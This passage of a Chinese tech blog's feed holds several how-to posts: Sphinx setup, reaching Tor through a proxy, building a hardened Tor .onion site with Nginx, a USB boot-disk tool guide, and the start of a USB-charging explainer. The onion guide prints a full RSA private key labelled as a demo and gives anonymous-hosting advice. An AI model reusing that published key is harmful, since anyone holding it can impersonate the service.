class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">root@null:~/Codes/Docs/Selfoss# sphinx-quickstart</span><br><span class="line">Welcome to the Sphinx 1.3.3 quickstart utility.</span><br><span class="line"></span><br><span class="line">Please enter values for the following settings (just press Enter to</span><br><span class="line">accept a default value, if one is given in brackets).</span><br><span class="line"></span><br><span class="line">Enter the root path for documentation.</span><br><span class="line">> Root path for the documentation [.]:</span><br><span class="line">// 输入文档根路径</span><br><span class="line">// 根路径的文件 [.]:</span><br><span class="line">// 默认不用更改,直接回车</span><br><span class="line"></span><br><span class="line">You have two options for placing the build directory for Sphinx output.</span><br><span class="line">Either, you use a directory "_build" within the root path, or you separate</span><br><span class="line">"source" and "build" directories within the root path.</span><br><span class="line">> Separate source and build directories (y/n) [n]: y</span><br><span class="line">// 独立的源和生成目录 (y/n) [n]:</span><br><span class="line">// 建议文档源代码与生成目录区别开,输入 y 回车</span><br><span class="line"></span><br><span class="line">Inside the root directory, two more directories will be created; "_templates"</span><br><span class="line">for custom HTML templates and "_static" for custom stylesheets and other static</span><br><span class="line">files. You can enter another prefix (such as ".") to replace the underscore.</span><br><span class="line">> Name prefix for templates and static dir [_]:</span><br><span class="line">// 模板和静态文件夹的前缀 [_]:</span><br><span class="line">// 使用默认的"_",直接回车</span><br><span class="line"></span><br><span class="line">The project name will occur in several places in the built documentation.</span><br><span class="line">> Project name: Selfoss</span><br><span class="line">// 项目名称</span><br><span class="line">> Author name(s): ZMOM1031</span><br><span class="line">// 作者名称</span><br><span class="line"></span><br><span class="line">Sphinx has the notion of a "version" and a "release" for the</span><br><span class="line">software. Each version can have multiple releases. For example, for</span><br><span class="line">Python the version is something like 2.5 or 3.0, while the release is</span><br><span class="line">something like 2.5.1 or 3.0a1. If you don't need this dual structure,</span><br><span class="line">just set both to the same value.</span><br><span class="line">> Project version: 1.0.0</span><br><span class="line">// 项目版本号</span><br><span class="line">> Project release [1.0.0]:</span><br><span class="line">// 项目发布版本号</span><br><span class="line"></span><br><span class="line">If the documents are to be written in a language other than English,</span><br><span class="line">you can select a language here by its language code. Sphinx will then</span><br><span class="line">translate text that it generates into that language.</span><br><span class="line"></span><br><span class="line">For a list of supported codes, see</span><br><span class="line">http://sphinx-doc.org/config.html#confval-language.</span><br><span class="line">> Project language [en]: zh_CN</span><br><span class="line">// 项目使用的语言</span><br><span class="line"></span><br><span class="line">The file name suffix for source files. Commonly, this is either ".txt"</span><br><span class="line">or ".rst". Only files with this suffix are considered documents.</span><br><span class="line">> Source file suffix [.rst]:</span><br><span class="line">// 文档源代码的后缀</span><br><span class="line"></span><br><span class="line">One document is special in that it is considered the top node of the</span><br><span class="line">"contents tree", that is, it is the root of the hierarchical structure</span><br><span class="line">of the documents. Normally, this is "index", but if your "index"</span><br><span class="line">document is a custom template, you can also set this to another filename.</span><br><span class="line">> Name of your master document (without suffix) [index]:</span><br><span class="line"></span><br><span class="line">Sphinx can also add configuration for epub output:</span><br><span class="line">> Do you want to use the epub builder (y/n) [n]:</span><br><span class="line">// 是否使用 epub 电子书生成</span><br><span class="line"></span><br><span class="line">Please indicate if you want to use one of the following Sphinx extensions:</span><br><span class="line">> autodoc: automatically insert docstrings from modules (y/n) [n]:</span><br><span class="line">> doctest: automatically test code snippets in doctest blocks (y/n) [n]:</span><br><span class="line">> intersphinx: link between Sphinx documentation of different projects (y/n) [n]:</span><br><span class="line">> todo: write "todo" entries that can be shown or hidden on build (y/n) [n]:</span><br><span class="line">> coverage: checks for documentation coverage (y/n) [n]:</span><br><span class="line">> pngmath: include math, rendered as PNG images (y/n) [n]:</span><br><span class="line">> mathjax: include math, rendered in the browser by MathJax (y/n) [n]:</span><br><span class="line">> ifconfig: conditional inclusion of content based on config values (y/n) [n]:</span><br><span class="line">> viewcode: include links to the source code of documented Python objects (y/n) [n]:</span><br><span class="line"></span><br><span class="line">A Makefile and a Windows command file can be generated for you so that you</span><br><span class="line">only have to run e.g. `make html' instead of invoking sphinx-build</span><br><span class="line">directly.</span><br><span class="line">> Create Makefile? (y/n) [y]:</span><br><span class="line">> Create Windows command file? (y/n) [y]:</span><br><span class="line"></span><br><span class="line">Creating file ./source/conf.py.</span><br><span class="line">Creating file ./source/index.rst.</span><br><span class="line">Creating file ./Makefile.</span><br><span class="line">Creating file ./make.bat.</span><br><span class="line"></span><br><span class="line">Finished: An initial directory structure has been created.</span><br><span class="line"></span><br><span class="line">You should now populate your master file ./source/index.rst and create other documentation</span><br><span class="line">source files. Use the Makefile to build the docs, like so:</span><br><span class="line"> make builder</span><br><span class="line">where "builder" is one of the supported builders, e.g. html, latex or linkcheck.</span><br></pre></td></tr></table></figure><p>初始化一个项目后会在当前目录创建以下文件</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── build// 编译输出文件夹</span><br><span class="line">├── make.bat// Windows 使用的 make 脚本</span><br><span class="line">├── Makefile// 定义编译信息的</span><br><span class="line">└── source// 文档源代码存放文件夹</span><br><span class="line"> ├── conf.py// 项目配置文件</span><br><span class="line"> ├── index.rst// 文档首页源代码</span><br><span class="line"> ├── _static// 静态文件夹?</span><br><span class="line"> └── _templates// 模板文件夹</span><br></pre></td></tr></table></figure><h2 id="编写文档"><a href="#编写文档" class="headerlink" title="编写文档"></a>编写文档</h2><p>编写文档使用 <code>reStructuredText</code> 语法,并保存到 <code>source</code> 目录里,文件后缀名使用 <code>.rst</code></p><h2 id="编译文档"><a href="#编译文档" class="headerlink" title="编译文档"></a>编译文档</h2><p>编译生成 HTML 网页文件<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make html</span><br></pre></td></tr></table></figure></p><p>除了生成 HTML 文件外,还可以使用 <code>make</code> 生成其它文件。</p><h2 id="修改主题"><a href="#修改主题" class="headerlink" title="修改主题"></a>修改主题</h2><p>这里的主题指的是生成的 HTML 页面样式。官方提供了好几种<a href="http://www.sphinx-doc.org/en/stable/theming.html" target="_blank" rel="noopener">样式</a>,这里使用的是 <a href="https://readthedocs.org/" target="_blank" rel="noopener">Read The Docs</a> 的样式</p><p>安装样式<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install sphinx_rtd_theme</span><br></pre></td></tr></table></figure></p><p>编辑配置文件<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim <span class="built_in">source</span>/conf.py</span><br></pre></td></tr></table></figure></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import sphinx_rtd_theme</span><br><span class="line"></span><br><span class="line">html_theme = "sphinx_rtd_theme"</span><br><span class="line"></span><br><span class="line">html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]</span><br></pre></td></tr></table></figure><p>其他样式配置稍有差异,请按照样式官方的配置方法配置</p><hr><ul><li>Sphinx 中文文档:<a href="https://sphinx-doc-zh.readthedocs.org/" target="_blank" rel="noopener">https://sphinx-doc-zh.readthedocs.org/</a></li><li>Sphinx 中文文档:<a href="https://zh-sphinx-doc.readthedocs.org/" target="_blank" rel="noopener">https://zh-sphinx-doc.readthedocs.org/</a></li><li>reStructuredText 中文文档:<a href="http://sphinx-doc-zh.readthedocs.org/" target="_blank" rel="noopener">http://sphinx-doc-zh.readthedocs.org/</a></li><li>reStructuredText 在线编辑器:<a href="http://rst.ninjs.org/" target="_blank" rel="noopener">http://rst.ninjs.org/</a></li><li>Read The Docs 文档存放:<a href="https://readthedocs.org/" target="_blank" rel="noopener">https://readthedocs.org/</a></li></ul>]]></content>
<summary type="html">
<p><a href="http://www.sphinx-doc.org/" target="_blank" rel="noopener">Sphinx</a> 是一个使用 Python 开发的文档编写生成程序,使用 <a href="http://docutils.sourceforge.net/rst.html" target="_blank" rel="noopener">reStructuredText</a> 语法编写文档,编译输出 HTML 页面文件、PDF 文件或其它格式的文件。<br>
</summary>
<category term="Sphinx" scheme="https://blog.iternull.com/tags/Sphinx/"/>
</entry>
<entry>
<title>如何访问暗网</title>
<link href="https://blog.iternull.com/posts/2016/01/06/How-to-Access-the-Dark-Web.html"/>
<id>https://blog.iternull.com/posts/2016/01/06/How-to-Access-the-Dark-Web.html</id>
<published>2016-01-06T14:52:27.000Z</published>
<updated>2017-02-11T05:59:10.070Z</updated>
<content type="html"><![CDATA[<p>这里介绍到暗网指的是基于 Tor 的匿名网站。<br><a id="more"></a></p><h2 id="安装-Tor-浏览器"><a href="#安装-Tor-浏览器" class="headerlink" title="安装 Tor 浏览器"></a>安装 Tor 浏览器</h2><p>访问 Tor 官网 <a href="https://www.torproject.org/" target="_blank" rel="noopener">www.torproject.org</a> 下载对应系统和语言的 Tor 浏览器版本。<br>安装时一直点下一步就行。</p><h2 id="配置-Tor-浏览器"><a href="#配置-Tor-浏览器" class="headerlink" title="配置 Tor 浏览器"></a>配置 Tor 浏览器</h2><p>第一次打开 Tor Browser,点击配置。</p><h3 id="网络服务提供商-ISP-是否对-Tor-网络连接进行封锁?"><a href="#网络服务提供商-ISP-是否对-Tor-网络连接进行封锁?" class="headerlink" title="网络服务提供商 (ISP) 是否对 Tor 网络连接进行封锁?"></a>网络服务提供商 (ISP) 是否对 Tor 网络连接进行封锁?</h3><p>墙内选择”是”,具体依据自己的网络环境选择。</p><p><img src="//files.iternull.com/images/2016-01-06_01-0001.png" alt=""></p><h3 id="选择使用集成网桥或输入自定义网桥"><a href="#选择使用集成网桥或输入自定义网桥" class="headerlink" title="选择使用集成网桥或输入自定义网桥"></a>选择使用集成网桥或输入自定义网桥</h3><p>默认选择即可</p><p><img src="//files.iternull.com/images/2016-01-06_01-0002.png" alt=""></p><h3 id="是否需要本地代理访问互联网"><a href="#是否需要本地代理访问互联网" class="headerlink" title="是否需要本地代理访问互联网"></a>是否需要本地代理访问互联网</h3><p>选择”是” (关键点)</p><p><img src="//files.iternull.com/images/2016-01-06_01-0003.png" alt=""></p><h3 id="本地代理配置"><a href="#本地代理配置" class="headerlink" title="本地代理配置"></a>本地代理配置</h3><p>代理类型、地址、端口、、、依据自己使用的代理服务而定<br>这里以 Shadowsocks 为例</p><p><img src="//files.iternull.com/images/2016-01-06_01-0004.png" alt=""></p><p>最后点击链接,等待片刻,运气好的话就链接上 Tor 网络了。</p><h2 id="访问网站"><a href="#访问网站" class="headerlink" title="访问网站"></a>访问网站</h2><p>基于 Tor 的匿名网站使用的是 <code>.onion</code> 的域名,在地址栏输入网址即可访问,除了可以访问 Tor 网站外,正常<br>网站也是可以访问的,当然也是基于 Tor 匿名访问的。</p><p><img src="//files.iternull.com/images/2016-01-06_01-0005.png" alt=""></p>]]></content>
<summary type="html">
<p>这里介绍到暗网指的是基于 Tor 的匿名网站。<br>
</summary>
<category term="Tor" scheme="https://blog.iternull.com/tags/Tor/"/>
<category term="Web" scheme="https://blog.iternull.com/tags/Web/"/>
<category term="Tor Browser" scheme="https://blog.iternull.com/tags/Tor-Browser/"/>
</entry>
<entry>
<title>如何创建一个 Tor .onion 网站</title>
<link href="https://blog.iternull.com/posts/2016/01/05/How-to-Create-a-Tor-onion-Site.html"/>
<id>https://blog.iternull.com/posts/2016/01/05/How-to-Create-a-Tor-onion-Site.html</id>
<published>2016-01-05T14:02:38.000Z</published>
<updated>2017-02-11T05:59:18.912Z</updated>
<content type="html"><![CDATA[<p>Tor 隐藏服务使用 .onion 域名。这里将向你演示如何创建一个安全配置以阻止信息泄露、隐藏服务的 .onion 网站。<br><a id="more"></a></p><h2 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h2><ul><li>不要在这台服务器上运行或做其它事情。</li><li>在新服务器或 VPS 上进行全新安装。</li><li>不要保留或运行来自 VPS 提供商那儿的任何服务。</li><li>用 Paypal 支付你的 VPS 服务,不过最好使用 Bitcoin。</li><li>不要向 VPS 提供关于你的任何身份信息。</li><li>不要在这台服务器上运行 Tor 中继,因为 Tor 中继在真实世界的公开 IP 是公开的。</li><li>不要从这台服务器发送电子邮件。</li><li>不要运行讨厌的或卑鄙的 Web 软件。如果你的 Web 软件有管理员登陆或管理员账号,把密码改成复杂的 26 个字符组成的密码。很多 Tor 网站被攻破只是某人猜到了管理员登陆密码。</li><li>避免使用任何 JavaScript 之类脚本的 Web 软件。</li><li>确保你的 Web 应用不会泄露任何错误信息或身份信息,比如在错误信息中的真实公开 IP。</li><li>审查 Web 前端代码,确保它不会从 jquery.com、Google Fonts 或任何外部服务拉取资源。</li><li>及时做好 VPS 的安全更新。</li></ul><p><strong>本文使用 Debian Wheezy , Nginx , Tor 提供 Web 服务。Nginx 将被配置为只监听 Tor,只可通过 Tor 访问。</strong></p><h2 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h2><p>安装 Nginx</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install nginx</span><br></pre></td></tr></table></figure><p>关闭 Nginx 版本信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/nginx/nginx.conf</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">http {</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"> server_tokens off;</span><br><span class="line"></span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>关闭 Nginx 日志</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/nginx/nginx.conf</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">http {</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"> ##</span><br><span class="line"> # Logging Settings</span><br><span class="line"> ##</span><br><span class="line"></span><br><span class="line"> #access_log /var/log/nginx/access.log;</span><br><span class="line"> #error_log /var/log/nginx/error.log;</span><br><span class="line"></span><br><span class="line">error_log /dev/null crit;</span><br></pre></td></tr></table></figure><h2 id="配置-Nginx-监听-localhost-8080-端口"><a href="#配置-Nginx-监听-localhost-8080-端口" class="headerlink" title="配置 Nginx 监听 localhost 8080 端口"></a>配置 Nginx 监听 localhost 8080 端口</h2><p>Nginx网站默认根目录位置在 <code>/usr/share/nginx/www</code> 可修改配置文件更改目录</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/nginx/sites-available/default</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">server {</span><br><span class="line"> listen 127.0.0.1:8080 default_server;</span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> root /usr/share/nginx/www;</span><br><span class="line"> index index.html index.htm;</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> allow 127.0.0.1;</span><br><span class="line"> deny all;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h2 id="重启-Nginx"><a href="#重启-Nginx" class="headerlink" title="重启 Nginx"></a>重启 Nginx</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service nginx restart</span><br></pre></td></tr></table></figure><p>关闭并移除 <code>rsyslog</code> 以关闭系统日志</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">service rsyslog stop</span><br><span class="line">apt-get remove --purge rsyslog</span><br></pre></td></tr></table></figure><p>关闭并移除所有可被用来发送邮件的程序 (MTA)</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">service exim stop</span><br><span class="line">service postfix stop</span><br><span class="line">service sendmail stop</span><br><span class="line">apt-get remove --purge exim</span><br><span class="line">apt-get remove --purge postfix</span><br><span class="line">apt-get remove --purge sendmail</span><br></pre></td></tr></table></figure><p>移除 <code>wget</code> 防止受到恶意脚本攻击时不会受到损害</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get remove wget</span><br></pre></td></tr></table></figure><p>禁用 SSH 连接时的 Debian 版本信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/ssh/sshd_config</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DebianBanner no</span><br></pre></td></tr></table></figure><h2 id="安装-Tor"><a href="#安装-Tor" class="headerlink" title="安装 Tor"></a>安装 Tor</h2><p>按照 torproject.org 文档添加 <code>Debian repo</code> 在<a href="https://www.torproject.org/docs/debian.html.en" target="_blank" rel="noopener">这里</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install tor</span><br></pre></td></tr></table></figure><h2 id="配置Tor服务"><a href="#配置Tor服务" class="headerlink" title="配置Tor服务"></a>配置Tor服务</h2><p>确保下面几行配置正确</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/tor/torrc</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HiddenServiceDir /var/lib/tor/hidden_service/</span><br><span class="line">HiddenServicePort 80 127.0.0.1:8080</span><br></pre></td></tr></table></figure><p>启动(或重启) Tor 服务</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service tor start</span><br></pre></td></tr></table></figure><p>当 Tor 启动时,它会在你的 <code>HiddenServiceDir</code> 文件夹创建了私钥,和一个唯一的 <code>.onion</code> 域名。</p><p>下面是这些文件的样子。当然,你应该永远不要暴露或显示你的私钥!保密。下面的密钥是供演示和学习之用。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">root@debian:~# cd /var/lib/tor/hidden_service/</span><br><span class="line">root@debian:/var/lib/tor/hidden_service# ls</span><br><span class="line">hostname private_key</span><br><span class="line">root@debian:/var/lib/tor/hidden_service# cat private_key </span><br><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIICXAIBAAKBgQC9ymfMgQk12AFT4PXWV+XfmZ1tVDaGajya/jIuwnwtjFdMWe7m</span><br><span class="line">VDWMjs8Z02GGJhH6tIIpoDUrWLi+YchNHlQBi2AnBFzAoSlfRcvobeBAaWuQn+aH</span><br><span class="line">Uzr+xVXOADSIcfgtT5Yd13RKmUEKFV8AO9u652zYP1ss0l+S2mY/J/t/3wIDAQAB</span><br><span class="line">AoGAMjQwcPBRN2UENOP1I9XsgNFpy1nTcor3rShArg3UO1g8X34Kq/Lql1vPfM1l</span><br><span class="line">ps67Qs4tAEXYyraVaAcFrSCwp6MyeKYwxZtT7ki7q3rbMycvbYquxquh0uGy4aed</span><br><span class="line">K8XWjPrUv3yzQSYslOehVWMTH7xTzaOvp5uhpAlHFRqN5MECQQDmpFkXmtfEGwqT</span><br><span class="line">bRbKegRs9siNY6McWBCGrYc/BrpXEiK0j2QcrjC/dMJ4P9O4A94aG4NSI/005fII</span><br><span class="line">vxrOmD9VAkEA0qhBVWeZD7amfvPYChQo0B4ACZZdJlcUd/x1JSOYbVKvRCvJLxjT</span><br><span class="line">5LMwg93jj2m386jXWx8n40Zcus6BTDr6YwJBAKH8E0ZszdVBWLAqEbOq9qjAuiHz</span><br><span class="line">NH+XqiOshCxTwVOdvRorCxjJjhspGdvyl/PJY5facuShuhgI13AlJ+KpMvECQHDJ</span><br><span class="line">l1lzw1bPc2uLgUM8MfHj7h8z+6G4hAQODmaZHVaDK8XzL59gyqqrajFgTyOM9emm</span><br><span class="line">n89w6flcxe9a+41mEoMCQBaM91yvrfp7N9BeDMCHlSDfAzX7sDqQn44ftHvZZI9V</span><br><span class="line">4IouuRuLlqN0iaw4V73v3MUeqXoasmdeZ89bVGhVrC8=</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br><span class="line">root@debian:/var/lib/tor/hidden_service# cat hostname </span><br><span class="line">juyy62wplbkk7gzy.onion</span><br><span class="line">root@debian:/var/lib/tor/hidden_service#</span><br></pre></td></tr></table></figure><h2 id="配置并使用防火墙"><a href="#配置并使用防火墙" class="headerlink" title="配置并使用防火墙"></a>配置并使用防火墙</h2><p>启用防火墙,有选择地允许 22 端口。如果稍微偏执些,根本不要允许 22 端口,仅仅从提供商的控制面板控制台来管理。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt-get install ufw</span><br><span class="line">ufw allow ssh</span><br><span class="line">ufw <span class="built_in">enable</span></span><br></pre></td></tr></table></figure><p>运气好的话,你现在应该可以访问你 <code>.onion</code> 的网址了,默认是 <code>Nginx</code> 页面。</p><p><img src="//files.iternull.com/images/2016-01-05_01-0001.png" alt=""></p><hr><ul><li>注:长城防火墙内的主机用此方法搭建的服务可能无法连接到 Tor 网络。</li><li>原文:<a href="https://scottlinux.com/2013/10/11/how-to-create-a-tor-onion-site/" target="_blank" rel="noopener">https://scottlinux.com/2013/10/11/how-to-create-a-tor-onion-site/</a></li></ul>]]></content>
<summary type="html">
<p>Tor 隐藏服务使用 .onion 域名。这里将向你演示如何创建一个安全配置以阻止信息泄露、隐藏服务的 .onion 网站。<br>
</summary>
<category term="Tor" scheme="https://blog.iternull.com/tags/Tor/"/>
<category term="onion" scheme="https://blog.iternull.com/tags/onion/"/>
<category term="Web" scheme="https://blog.iternull.com/tags/Web/"/>
</entry>
<entry>
<title>WinSetupFromUSB 使用介绍</title>
<link href="https://blog.iternull.com/posts/2015/12/21/WinSetupFromUSB-Introduction.html"/>
<id>https://blog.iternull.com/posts/2015/12/21/WinSetupFromUSB-Introduction.html</id>
<published>2015-12-21T06:08:25.000Z</published>
<updated>2017-02-11T06:01:40.148Z</updated>
<content type="html"><![CDATA[<p>WinSetupFromUSB 是一款制作多系统镜像启动U盘的工具,使用Grub4Dos做引导。<br>本人以前试过使用Grub制作多系统安装盘,效果不好,加载慢、花屏、崩溃,只能引导小的PE系统镜像。<br><a id="more"></a><br><img src="//files.iternull.com/images/2015-12-21_01-0001.png" alt=""></p><h2 id="下载安装"><a href="#下载安装" class="headerlink" title="下载安装"></a>下载安装</h2><p>去 <a href="http://www.winsetupfromusb.com/" target="_blank" rel="noopener">WinSetupFromUSB</a> 官网下载 <a href="http://downloads.winsetupfromusb.com/WinSetupFromUSB-1-6.exe" target="_blank" rel="noopener">WinSetupFromUSB 1.6</a><br>下载时可能没法下载,这是网站的问题,开发者没加上网页的某个功能,需要手动使用浏览器调试工具提取下载链接。<br>下载下来的是一个自解压的压缩包,运行它,解压到当前目录,打开文件夹,运行你系统位数对应的版本。</p><h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h2><p>第一次使用建议先备份U盘原有的文件后再格式化。WinSetupFromUSB 会自动检测到U盘。<br>第一次创建启动盘记得勾选上 <code>Auto format it with FBInst</code> 有一堆选项,默认不用改。</p><p><img src="//files.iternull.com/images/2015-12-21_01-0002.png" alt=""></p><p>在下面的 <code>Add to USB disk</code> 的选项里选择对应系统镜像的选项,添加系统镜像,一个选项框一次只能添加一个镜像。</p><p><img src="//files.iternull.com/images/2015-12-21_01-0003.png" alt=""></p><p>最下面一排选项:<br>(Advanced options) 高级设置(不知道自己在干什么的不要乱点)<br>(Test in QEMU) 使用QEMU虚拟机测试<br>(Show Log) 查看软件运行日志</p><p>最后点击 <code>GO</code> 开始制作<br>完成后弹出 <code>job done</code> 的窗口</p><p>添加系统镜像,制作过一次启动U盘后已经把Grub4Dos写入U盘了,下次再添加就行不要再勾选 <code>Auto format it with FBInst</code> 直接在对应的选项框里添加镜像文件,点击 <code>GO</code> 写入U盘</p><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>FAT32 文件系统默认最大单文件大小是 <code>4GB</code> 遇到大于4GB的系统镜像不用担心,WinSetupFromUSB 默认会对文件进行分卷。</p><p>在创建 Linux 系统镜像的时候可以在高级选项里,设置创建一个持久性的文件,默认 <code>300MB</code>,其实就是创建一个指定大小的文件 <code>ext2</code> 格式,在加载这个镜像的时候自动挂载,你可以在里面存文件,从起不会丢失。如果使用的是FAT32格式的制作的启动盘可以不用考虑使用这个</p><p><img src="//files.iternull.com/images/2015-12-21_01-0004.png" alt=""></p><hr><h2 id="链接"><a href="#链接" class="headerlink" title="链接"></a>链接</h2><ul><li>教程:<a href="http://www.winsetupfromusb.com/tutorials/" target="_blank" rel="noopener">http://www.winsetupfromusb.com/tutorials/</a></li><li>常问问题:<a href="http://www.winsetupfromusb.com/faq/" target="_blank" rel="noopener">http://www.winsetupfromusb.com/faq/</a></li></ul>]]></content>
<summary type="html">
<p>WinSetupFromUSB 是一款制作多系统镜像启动U盘的工具,使用Grub4Dos做引导。<br>本人以前试过使用Grub制作多系统安装盘,效果不好,加载慢、花屏、崩溃,只能引导小的PE系统镜像。<br>
</summary>
<category term="WinSetupFromUSB" scheme="https://blog.iternull.com/tags/WinSetupFromUSB/"/>
</entry>
<entry>
<title>SecUSB 安全充电的工作原理</title>
<link href="https://blog.iternull.com/posts/2015/09/28/SecUSB-Working-Principle.html"/>
<id>https://blog.iternull.com/posts/2015/09/28/SecUSB-Working-Principle.html</id>
<published>2015-09-28T00:38:29.000Z</published>
<updated>2017-02-11T06:00:43.055Z</updated>
<content type="html"><![CDATA[<p><img src="//files.iternull.com/images/2015-09-28_01-0001.png" alt=""><br><a id="more"></a><br>要了解它的工作原理,先要了解USB每根针脚的含义。</p><h2 id="USB引脚"><a href="#USB引脚" class="headerlink" title="USB引脚"></a>USB引脚</h2><table><thead><tr><th>Pin</th><th>名称</th><th>电缆颜色</th><th>含义</th></tr></thead><tbody><tr><td>1</td><td>VCC</td><td>Red</td><td>+5 VDC</td></tr><tr><td>2</td><td>D-</td><td>White</td><td>Data -</td></tr><tr><td>3</td><td>D+</td><td>Green</td><td>Data +</td></tr><tr><td>4</td><td>GND</td><td>Black</td><td>Ground</td></tr></tbody></table><h2 id="USB引脚信号"><a href="#USB引脚信号" class="headerlink" title="USB引脚信号"></a>USB引脚信号</h2><p>USB是一种串行总线。它使用4屏蔽线:两个用于电源(+5V & GND),两个用于差分数据信号(在引脚标记为D+和D-)。NRZI(不归零反转),用于与一个同步字段发送数据来同步主机和接收机时钟的编码方案。在USB数据线<code>Data+</code>和<code>Data-</code>信号通过双绞线进行发送。没有终止需要。半双工差分信号有助于消除在较长线路的电磁噪声的影响。</p><h2 id="安全充电原理"><a href="#安全充电原理" class="headerlink" title="安全充电原理"></a>安全充电原理</h2><p>可以看出普通USB有<code>4</code>根引脚,<code>2</code>根是用做电源线的,另<code>2</code>根是用作数据传输的,那么只要把数据传输的线路断开,就从物理上隔离了数据,恶意程序也就无法从电脑上通过USB传输到你手机上了。<br><img src="//files.iternull.com/images/2015-09-28_01-0002.jpg" 